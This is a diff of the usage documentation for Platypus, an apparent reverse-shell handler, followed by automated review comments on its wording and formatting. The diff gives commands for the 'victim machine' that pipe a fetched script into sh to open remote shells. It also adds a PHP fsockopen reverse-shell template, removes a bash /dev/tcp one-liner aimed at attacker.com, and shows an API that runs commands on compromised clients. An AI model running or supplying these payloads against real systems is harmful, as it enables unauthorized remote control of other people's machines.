diff --git a/USAGE.md b/USAGE.md index 423b518c..f97f0b79 100644 --- a/USAGE.md +++ b/USAGE.md 
@@ -1,26 +1,40 @@ ## Reverse shell as a Service -Platypus is able to multiplexing the reverse shell listening port. The port 8080 can receive reverse shell client connection, also these is a Reverse Shell as a Service (RaaS) running on this port. -Assume that you have got an arbitrary rce on the target application, but the target application will strip the non-alph letter like `&`, `>`. then this feature will be useful. +Platypus is able to multiplex the reverse shell listening port. Port 8080 can receive reverse shell client connection, also there is a Reverse Shell as a Service (RaaS) running on this port. -To archive this, all you need is to construct a url which indicate the target +Assume that you have got an arbitrary RCE on the target application, but the target application will strip the non-alphabet letter like `&`, `>`. then this feature will be useful. + +To archive this, all you need is to construct a URL that indicates the target. + +### Quick start + +1. Start platypus and listen to any port (eg: 1.2.3.4 1337) +2. Execute `curl http://1.2.3.4 | sh` on the victim machine + +### Specifying language of reverse shell command (default: bash) + +1. Start platypus and listen to any port (eg: 1.2.3.4 1337) +2. Execute `curl http://1.2.3.4/python | sh` on the victim machine + +### What if I want to pop up the reverse shell to another IP (5.6.7.8) and port (7331)? + +By default, the new reverse shell will be popped up to the server which the port which the HTTP request sent, but you can simply change the IP and port by following these steps: + +1. Start platypus and listen to any port (eg: 1.2.3.4 1337) +2. 
Execute `curl http://1.2.3.4/5.6.7.8/7331/python | sh` on the victim machine + +### How to add a new language + +Currently, platypus support `awk`, `bash`, `go`, `Lua`, `NC`, `Perl`, `PHP`, `python` and `ruby` that were simply stolen from [PayloadAllThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md), and you can check `templates` folder to view all templates. Also, adding new language support is simple, just replace the real IP and port with `__HOST__` and `__PORT__`. ```bash -// victim will be redirected to attacker-host attacker-port -// sh -c "$(curl http://host:port/attacker-host/attacker-port)" -# curl http://192.168.1.2:8080/attacker.com/1337 -bash -c 'bash -i >/dev/tcp/attacker.com/1337 0>&1' -# sh -c "$(curl http://192.168.1.2:8080/attacker.com/1337)" - -// if the attacker info not specified, it will use host, port as attacker-host attacker-port -// sh -c "$(curl http://host:port/)" -# curl http://192.168.1.2:8080/ -curl http://192.168.1.2:8080/192.168.1.2/8080|sh -# sh -c "$(curl http://host:port/)" +php -r '$sock=fsockopen("__HOST__",__PORT__);popen("/bin/sh -i <&3 >&3 2>&3", "r");' ``` ## RESTful API + * `GET /client` List all online clients + ``` # curl 'http://127.0.0.1:9090/client' { @@ -30,7 +44,9 @@ curl http://192.168.1.2:8080/192.168.1.2/8080|sh "status": true } ``` + * `POST /client/:hash` execute a command on a specific client + ``` # curl -X POST 'http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4' --data 'cmd=whoami' { @@ -38,7 +54,9 @@ curl http://192.168.1.2:8080/192.168.1.2/8080|sh "msg": "root\n", } ``` + * How to hash? + ``` # echo -n "192.168.1.3:54798" | md5sum 0723c3bed0d0240140e10a6ffd36eed4 -
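Review bot: the three step lists in the first hunk still omit the port the reader was just told to listen on: step 1 says "listen to any port (eg: 1.2.3.4 1337)" but step 2 fetches `http://1.2.3.4`, `http://1.2.3.4/python` and `http://1.2.3.4/5.6.7.8/7331/python` with no port, while the opening paragraph says the RaaS runs on port 8080. Please write the URLs as `http://1.2.3.4:1337/...` (or state that the service is served on whatever port Platypus listens on) so the paragraph and the steps agree, and since anything that can reach that port obtains a shell command with a plain GET, the Quick start should say which interface the listener binds to. Several wording problems survive the rewrite: "To archive this" should be "To achieve this", "platypus support" should be "platypus supports", "non-alphabet letter like `&`, `>`. then this feature" is a fragment (e.g. "non-alphabetic characters such as `&` or `>`; in that case this feature is useful"), and "popped up to the server which the port which the HTTP request sent" should read "sent back to the host and port that served the HTTP request". In the replaced code block the fence is tagged `bash` but the only remaining content is a PHP one-liner; tag it `php` or keep one `bash` template, and the sentence "just replace the real IP and port with `__HOST__` and `__PORT__`" does not say what file name in `templates` a new language must use for a `/python`-style URL path to select it. The removed lines also documented the `sh -c "$(curl http://host:port/...)"` invocation, which the new text no longer shows anywhere; either restore that example or drop it deliberately. Lastly, the link text "PayloadAllThings" does not match the repository name PayloadsAllTheThings, and "stolen from" would read better as "adapted from".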
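Review bot: in the second hunk the blank lines added around `* POST /client/:hash` fix the list rendering, but the fenced blocks in the RESTful API section still carry no language tag, so the `# curl ...` prompt line and the JSON reply render as one untyped block; tag them (for instance `bash`) or separate the request from the response. The description "execute a command on a specific client" should also say what the example only implies: that the command is passed as form data in the `cmd` field (`--data 'cmd=whoami'`), and, because the sample request carries no credentials, whether the API is intended to be reachable only on 127.0.0.1 as in the examples.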
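Review bot: in the third hunk the sample response in the unchanged context, `"msg": "root\n", }`, has a trailing comma before the closing brace and is therefore not valid JSON; drop the comma so the example can be pasted into a parser. The "How to hash?" item only shows `echo -n "192.168.1.3:54798" | md5sum`; it should state in words that `:hash` is the MD5 of the client's `ip:port` string exactly as listed by `GET /client`, and that `-n` matters because a trailing newline changes the digest.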